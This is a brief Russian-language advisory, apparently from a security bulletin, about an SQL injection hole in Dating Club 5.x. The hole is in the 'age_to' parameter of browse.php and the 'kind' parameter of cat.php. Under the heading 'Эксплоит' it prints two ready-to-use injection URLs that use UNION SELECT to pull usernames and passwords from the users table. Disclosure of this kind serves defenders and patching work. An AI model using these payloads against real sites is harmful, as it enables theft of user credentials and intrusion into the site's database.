Программа: Dating Club 5.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "age_to" сценарием browse.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

browse.php?mode=browsebyCat&_gender=0&age_from=15& age_to=-4214/* */union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body

cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9 +from+users/*



Оставить мнение